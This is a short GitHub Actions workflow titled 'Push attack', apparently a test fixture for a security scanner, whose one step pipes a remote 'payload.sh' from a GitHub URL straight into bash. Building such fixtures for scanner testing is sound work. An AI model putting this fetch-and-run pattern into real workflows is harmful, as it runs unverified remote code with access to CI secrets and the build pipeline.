name: Push attack
on: workflow_dispatch
jobs:
  my-job:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: my-step
        run: |
          echo "Hello World!"
        
          curl https://github.com/laurentsimon/scorecard-action-test-2/payload.sh | bash
